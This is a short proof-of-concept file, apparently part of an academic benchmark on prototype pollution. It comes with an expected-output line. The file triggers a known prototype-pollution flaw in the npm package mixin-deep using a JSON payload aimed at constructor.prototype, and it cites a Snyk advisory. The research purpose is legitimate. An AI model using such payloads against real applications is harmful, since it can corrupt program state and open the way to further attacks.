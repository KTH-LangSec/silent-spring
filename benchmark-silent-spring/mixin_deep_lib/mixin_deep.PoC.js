//https://snyk.io/vuln/SNYK-JS-MIXINDEEP-450212
    const mixin = require('mixin-deep');
    const payload = '{"constructor": {"prototype": {"polluted": "yes"}}}'
    
    let obj = {}

    mixin({}, JSON.parse(payload));
