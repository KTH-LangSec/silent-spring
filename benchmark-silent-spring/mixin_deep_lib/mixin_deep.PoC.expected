node_modules/mixin-deep/index.js:21:17